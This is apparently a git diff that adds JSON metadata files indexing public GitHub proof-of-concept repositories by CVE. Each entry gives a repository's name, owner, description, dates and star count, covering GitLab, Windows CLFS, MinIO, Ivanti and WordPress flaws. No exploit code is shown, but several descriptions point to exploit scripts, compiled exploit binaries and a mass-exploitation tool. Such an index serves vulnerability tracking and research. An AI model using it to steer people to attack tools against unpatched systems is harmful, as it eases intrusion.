"https:\/\/github.com\/yuimarudev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuimarudev\/CVE-2023-2825", + "description": "CVE-2023-2825 list", + "fork": false, + "created_at": "2023-05-28T02:14:37Z", + "updated_at": "2023-05-28T02:14:37Z", + "pushed_at": "2023-05-28T02:14:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647150606, + "name": "CVE-2023-2825-Gitlab", + "full_name": "Tornad0007\/CVE-2023-2825-Gitlab", + "owner": { + "login": "Tornad0007", + "id": 93181695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93181695?v=4", + "html_url": "https:\/\/github.com\/Tornad0007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tornad0007\/CVE-2023-2825-Gitlab", + "description": "the proof of concept written in Python for an unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups. This is a critical severity issue ", + "fork": false, + "created_at": "2023-05-30T07:03:19Z", + "updated_at": "2023-05-30T07:05:44Z", + "pushed_at": "2023-05-30T07:05:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 649827572, + "name": "CVE-2023-2825", + "full_name": "Rubikcuv5\/CVE-2023-2825", + "owner": { + "login": "Rubikcuv5", + "id": 47946047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4", + "html_url": "https:\/\/github.com\/Rubikcuv5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubikcuv5\/CVE-2023-2825", + "description": "On May 23, 2023 GitLab released version 16.0.1 which fixed a critical vulnerability, CVE-2023-2825, affecting the Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. The vulnerability allows unauthenticated users to read arbitrary files through a path traversal bug.", + "fork": false, + "created_at": "2023-06-05T18:16:51Z", + "updated_at": "2023-06-19T21:41:12Z", + "pushed_at": "2023-06-17T01:22:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689671335, + "name": "CVE-2023-2825", + "full_name": "caopengyan\/CVE-2023-2825", + "owner": { + "login": "caopengyan", + "id": 87455626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455626?v=4", + "html_url": "https:\/\/github.com\/caopengyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/caopengyan\/CVE-2023-2825", + "description": null, + "fork": false, + "created_at": "2023-09-10T14:51:30Z", + "updated_at": "2023-09-10T14:52:52Z", + "pushed_at": "2023-09-10T15:36:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817964661, + "name": "CVE-2023-2825", + "full_name": "cc3305\/CVE-2023-2825", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2023-2825", + "description": "CVE-2023-2825 exploit script", + "fork": false, + "created_at": "2024-06-20T20:22:01Z", + "updated_at": "2024-07-27T20:19:49Z", + "pushed_at": "2024-07-27T20:19:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28252.json b/2023/CVE-2023-28252.json new file mode 100644 index 0000000000..2b59ef417b --- /dev/null +++ b/2023/CVE-2023-28252.json @@ -0,0 +1,219 @@ +[ + { + "id": 659242316, + "name": "CVE-2023-28252", + "full_name": "fortra\/CVE-2023-28252", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2023-28252", + "description": null, + "fork": false, + "created_at": "2023-06-27T12:22:05Z", + "updated_at": "2024-11-19T08:49:17Z", + "pushed_at": "2023-07-10T16:57:44Z", + "stargazers_count": 173, + "watchers_count": 173, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 173, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 673742042, + "name": "CVE-2023-28252", + "full_name": "726232111\/CVE-2023-28252", + "owner": { + "login": "726232111", + "id": 34729943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34729943?v=4", + "html_url": "https:\/\/github.com\/726232111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/726232111\/CVE-2023-28252", + "description": null, + "fork": false, + "created_at": "2023-08-02T10:14:40Z", + "updated_at": "2023-11-24T02:55:08Z", + "pushed_at": "2023-08-02T10:16:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 718019226, + "name": "CVE-2023-28252-", + "full_name": "Danasuley\/CVE-2023-28252-", + "owner": { + "login": "Danasuley", + "id": 148750257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148750257?v=4", + "html_url": "https:\/\/github.com\/Danasuley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Danasuley\/CVE-2023-28252-", + "description": "Обнаружение эксплойта CVE-2023-28252 ", + "fork": false, + "created_at": "2023-11-13T07:46:38Z", + "updated_at": "2023-11-13T07:46:39Z", + "pushed_at": "2023-11-13T07:55:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737810016, + "name": "Compiled-PoC-Binary-For-CVE-2023-28252", + "full_name": "bkstephen\/Compiled-PoC-Binary-For-CVE-2023-28252", + "owner": { + "login": "bkstephen", + "id": 8013595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8013595?v=4", + "html_url": "https:\/\/github.com\/bkstephen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bkstephen\/Compiled-PoC-Binary-For-CVE-2023-28252", + "description": "The repo contains a precompiled binary which can be run on a Windows machine vulnerable to CVE-2023-28252", + "fork": false, + "created_at": "2024-01-01T15:30:33Z", + "updated_at": "2024-06-21T07:22:21Z", + "pushed_at": "2024-01-01T15:39:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746601760, + "name": "CVE-2023-28252-Compiled-exe", + "full_name": "duck-sec\/CVE-2023-28252-Compiled-exe", + "owner": { + "login": "duck-sec", + "id": 129839654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4", + "html_url": "https:\/\/github.com\/duck-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-28252-Compiled-exe", + "description": "A modification to fortra's CVE-2023-28252 exploit, compiled to exe", + "fork": false, + "created_at": "2024-01-22T10:38:02Z", + "updated_at": "2024-09-29T10:54:58Z", + "pushed_at": "2024-01-24T13:45:56Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 775566247, + "name": "CLFS", + "full_name": "byt3n33dl3\/CLFS", + "owner": { + "login": "byt3n33dl3", + "id": 151133481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151133481?v=4", + "html_url": "https:\/\/github.com\/byt3n33dl3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byt3n33dl3\/CLFS", + "description": "it's a CVE-2023-28252 (Patched), but feel free to use it for check any outdated software or reseach", + "fork": false, + "created_at": "2024-03-21T16:16:52Z", + "updated_at": "2024-11-17T16:50:38Z", + "pushed_at": "2024-07-09T03:43:41Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815887734, + "name": "CVE-2023-28252", + "full_name": "Vulmatch\/CVE-2023-28252", + "owner": { + "login": "Vulmatch", + "id": 70934566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70934566?v=4", + "html_url": "https:\/\/github.com\/Vulmatch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulmatch\/CVE-2023-28252", + "description": "The TL;DR for the learnings of Windows Vulnerability CVE-2023-28252", + "fork": false, + "created_at": "2024-06-16T12:35:57Z", + "updated_at": "2024-06-16T13:06:54Z", + "pushed_at": "2024-06-16T13:06:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28324.json b/2023/CVE-2023-28324.json new file mode 100644 index 0000000000..a6cf5e87ce --- /dev/null +++ b/2023/CVE-2023-28324.json @@ -0,0 +1,33 @@ +[ + { + "id": 856944203, + "name": "CVE-2023-28324", + "full_name": "horizon3ai\/CVE-2023-28324", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-28324", + "description": "Ivanti EPM AgentPortal RCE Vulnerability", + "fork": false, + "created_at": "2024-09-13T14:02:04Z", + "updated_at": "2024-11-26T23:19:45Z", + "pushed_at": "2024-09-16T14:24:20Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 21, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28329.json b/2023/CVE-2023-28329.json new file mode 100644 index 0000000000..72c5bda576 --- /dev/null +++ b/2023/CVE-2023-28329.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569754, + "name": "CVE-2023-28329", + "full_name": "cli-ish\/CVE-2023-28329", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-28329", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:04Z", + "updated_at": "2023-10-18T07:58:05Z", + "pushed_at": "2023-10-18T07:58:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2833.json b/2023/CVE-2023-2833.json new file mode 100644 index 0000000000..033cc1a9a0 --- /dev/null +++ b/2023/CVE-2023-2833.json @@ -0,0 +1,33 @@ +[ + { + "id": 655914171, + "name": "CVE-2023-2833", + "full_name": "Alucard0x1\/CVE-2023-2833", + "owner": { + "login": "Alucard0x1", + "id": 3710918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710918?v=4", + "html_url": "https:\/\/github.com\/Alucard0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alucard0x1\/CVE-2023-2833", + "description": "Mass Exploit Privileges Authentication (Subscriber to Administrator) - Wordpress Plugin ReviewX ", + "fork": false, + "created_at": "2023-06-19T22:10:09Z", + "updated_at": "2023-07-07T14:35:35Z", + "pushed_at": "2023-06-19T22:46:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28330.json b/2023/CVE-2023-28330.json new file mode 100644 index 0000000000..2f62b98f23 --- /dev/null +++ b/2023/CVE-2023-28330.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569827, + "name": "CVE-2023-28330", + "full_name": "cli-ish\/CVE-2023-28330", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-28330", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:16Z", + "updated_at": "2023-10-18T07:58:16Z", + "pushed_at": "2023-10-18T07:58:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28343.json b/2023/CVE-2023-28343.json new file mode 100644 index 0000000000..71ba874a48 --- /dev/null +++ b/2023/CVE-2023-28343.json @@ -0,0 +1,95 @@ +[ + { + "id": 616937181, + "name": "CVE-2023-28343", + "full_name": "gobysec\/CVE-2023-28343", + "owner": { + "login": "gobysec", + "id": 50955360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50955360?v=4", + "html_url": "https:\/\/github.com\/gobysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gobysec\/CVE-2023-28343", + "description": "Altenergy Power System Control Software set_timezone RCE Vulnerability (CVE-2023-28343)", + "fork": false, + "created_at": "2023-03-21T11:41:36Z", + "updated_at": "2024-01-02T10:32:19Z", + "pushed_at": "2023-03-22T04:26:17Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618014056, + "name": "CVE-2023-28343", + "full_name": "superzerosec\/CVE-2023-28343", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2023-28343", + "description": "CVE-2023-28343 POC exploit", + "fork": false, + "created_at": "2023-03-23T15:19:02Z", + "updated_at": "2023-07-03T18:51:31Z", + "pushed_at": "2023-03-23T15:23:13Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 661672662, + "name": "CVE-2023-28343", + "full_name": "hba343434\/CVE-2023-28343", + "owner": { + "login": "hba343434", + "id": 120598843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120598843?v=4", + "html_url": "https:\/\/github.com\/hba343434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hba343434\/CVE-2023-28343", + "description": "CVE-2023-28343", + "fork": false, + "created_at": "2023-07-03T11:48:21Z", + "updated_at": "2024-10-23T13:08:05Z", + "pushed_at": "2023-07-03T11:50:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28354.json b/2023/CVE-2023-28354.json new file mode 100644 index 0000000000..9339f44b34 --- /dev/null +++ b/2023/CVE-2023-28354.json @@ -0,0 +1,33 @@ +[ + { + "id": 891574745, + "name": "CVE-2023-28354", + "full_name": "stormfleet\/CVE-2023-28354", + "owner": { + "login": "stormfleet", + "id": 48259298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48259298?v=4", + "html_url": "https:\/\/github.com\/stormfleet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stormfleet\/CVE-2023-28354", + "description": "CVE-2023-28354", + "fork": false, + "created_at": "2024-11-20T15:19:32Z", + "updated_at": "2024-11-25T10:33:55Z", + "pushed_at": "2024-11-25T10:33:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-28432.json b/2023/CVE-2023-28432.json new file mode 100644 index 0000000000..23cf40086c --- /dev/null +++ b/2023/CVE-2023-28432.json @@ -0,0 +1,594 @@ +[ + { + "id": 617997824, + "name": "CVE-2023-28432", + "full_name": "Mr-xn\/CVE-2023-28432", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2023-28432", + "description": "CVE-2023-28434 nuclei templates", + "fork": false, + "created_at": "2023-03-23T14:44:24Z", + "updated_at": "2024-06-21T10:46:37Z", + "pushed_at": "2023-03-23T15:53:05Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "info-leak", + "minio" + ], + "visibility": "public", + "forks": 8, + "watchers": 32, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618043888, + "name": "CVE-2023-28432", + "full_name": "gobysec\/CVE-2023-28432", + "owner": { + "login": "gobysec", + "id": 50955360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50955360?v=4", + "html_url": "https:\/\/github.com\/gobysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gobysec\/CVE-2023-28432", + "description": "MiniO verify interface sensitive information disclosure vulnerability (CVE-2023-28432) ", + "fork": false, + "created_at": "2023-03-23T16:27:47Z", + "updated_at": "2024-07-16T01:07:38Z", + "pushed_at": "2023-03-24T02:27:36Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618239295, + "name": "minio_unauth_check", + "full_name": "Okaytc\/minio_unauth_check", + "owner": { + "login": "Okaytc", + "id": 50813688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813688?v=4", + "html_url": "https:\/\/github.com\/Okaytc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Okaytc\/minio_unauth_check", + "description": "CVE-2023-28432,minio未授权访问检测工具", + "fork": false, + "created_at": "2023-03-24T03:15:28Z", + "updated_at": "2023-06-28T07:25:42Z", + "pushed_at": "2023-03-24T06:31:37Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618321930, + "name": "CVE-2023-28432", + "full_name": "MzzdToT\/CVE-2023-28432", + "owner": { + "login": "MzzdToT", + "id": 44486276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44486276?v=4", + "html_url": "https:\/\/github.com\/MzzdToT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MzzdToT\/CVE-2023-28432", + "description": "MinIO敏感信息泄露漏洞批量扫描poc&exp", + "fork": false, + "created_at": "2023-03-24T08:13:34Z", + "updated_at": "2024-08-12T03:47:35Z", + "pushed_at": "2023-03-24T08:19:42Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618327066, + "name": "CVE-2023-28432", + "full_name": "acheiii\/CVE-2023-28432", + "owner": { + "login": "acheiii", + "id": 48488540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48488540?v=4", + "html_url": "https:\/\/github.com\/acheiii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acheiii\/CVE-2023-28432", + "description": "CVE-2023-28432 POC", + "fork": false, + "created_at": "2023-03-24T08:27:32Z", + "updated_at": "2024-05-11T12:01:45Z", + "pushed_at": "2023-03-24T08:53:49Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619455026, + "name": "Cve-2023-28432-", + "full_name": "steponeerror\/Cve-2023-28432-", + "owner": { + "login": "steponeerror", + "id": 60814302, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60814302?v=4", + "html_url": "https:\/\/github.com\/steponeerror", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/steponeerror\/Cve-2023-28432-", + "description": "通过vulhub的复现过程实现了,基本的批量检测。比较垃圾但是勉强能用", + "fork": false, + "created_at": "2023-03-27T07:14:06Z", + "updated_at": "2023-05-17T07:40:44Z", + "pushed_at": "2023-03-27T07:17:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 620587865, + "name": "CVE-2023-28432", + "full_name": "Cuerz\/CVE-2023-28432", + "owner": { + "login": "Cuerz", + "id": 84277976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84277976?v=4", + "html_url": "https:\/\/github.com\/Cuerz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cuerz\/CVE-2023-28432", + "description": "CVE-2023-28432 MinIO敏感信息泄露检测脚本", + "fork": false, + "created_at": "2023-03-29T01:26:30Z", + "updated_at": "2023-09-19T05:08:20Z", + "pushed_at": "2023-03-29T01:40:42Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624418578, + "name": "Minio-CVE-2023-28432", + "full_name": "LHXHL\/Minio-CVE-2023-28432", + "owner": { + "login": "LHXHL", + "id": 44888589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44888589?v=4", + "html_url": "https:\/\/github.com\/LHXHL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LHXHL\/Minio-CVE-2023-28432", + "description": null, + "fork": false, + "created_at": "2023-04-06T12:29:31Z", + "updated_at": "2023-08-23T02:00:24Z", + "pushed_at": "2023-04-06T12:52:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625670330, + "name": "CVE-2023-28432_docker", + "full_name": "h0ng10\/CVE-2023-28432_docker", + "owner": { + "login": "h0ng10", + "id": 1886150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1886150?v=4", + "html_url": "https:\/\/github.com\/h0ng10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h0ng10\/CVE-2023-28432_docker", + "description": "Test environments for CVE-2023-28432, information disclosure in MinIO clusters", + "fork": false, + "created_at": "2023-04-09T20:28:33Z", + "updated_at": "2023-04-09T20:28:33Z", + "pushed_at": "2023-04-10T04:18:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627328650, + "name": "MinIO_CVE-2023-28432_EXP", + "full_name": "CHINA-china\/MinIO_CVE-2023-28432_EXP", + "owner": { + "login": "CHINA-china", + "id": 92798047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92798047?v=4", + "html_url": "https:\/\/github.com\/CHINA-china", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CHINA-china\/MinIO_CVE-2023-28432_EXP", + "description": null, + "fork": false, + "created_at": "2023-04-13T08:36:52Z", + "updated_at": "2023-04-13T08:39:15Z", + "pushed_at": "2023-04-13T08:50:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646183182, + "name": "CVE-2023-28432-metasploit-scanner", + "full_name": "TaroballzChen\/CVE-2023-28432-metasploit-scanner", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2023-28432-metasploit-scanner", + "description": "MinIO Information Disclosure Vulnerability scanner by metasploit", + "fork": false, + "created_at": "2023-05-27T14:55:07Z", + "updated_at": "2023-08-06T21:43:54Z", + "pushed_at": "2023-05-27T15:35:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 681035124, + "name": "CVE-2023-28432", + "full_name": "bingtangbanli\/CVE-2023-28432", + "owner": { + "login": "bingtangbanli", + "id": 77956516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77956516?v=4", + "html_url": "https:\/\/github.com\/bingtangbanli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bingtangbanli\/CVE-2023-28432", + "description": "CVE-2023-28432检测工具", + "fork": false, + "created_at": "2023-08-21T06:03:25Z", + "updated_at": "2023-08-28T03:20:30Z", + "pushed_at": "2023-08-26T15:30:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 687511506, + "name": "CVE-2023-28432", + "full_name": "Chocapikk\/CVE-2023-28432", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-28432", + "description": "Automated vulnerability scanner for CVE-2023-28432 in Minio deployments, revealing sensitive environment variables.", + "fork": false, + "created_at": "2023-09-05T14:01:53Z", + "updated_at": "2024-08-12T20:32:41Z", + "pushed_at": "2023-09-05T14:02:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": 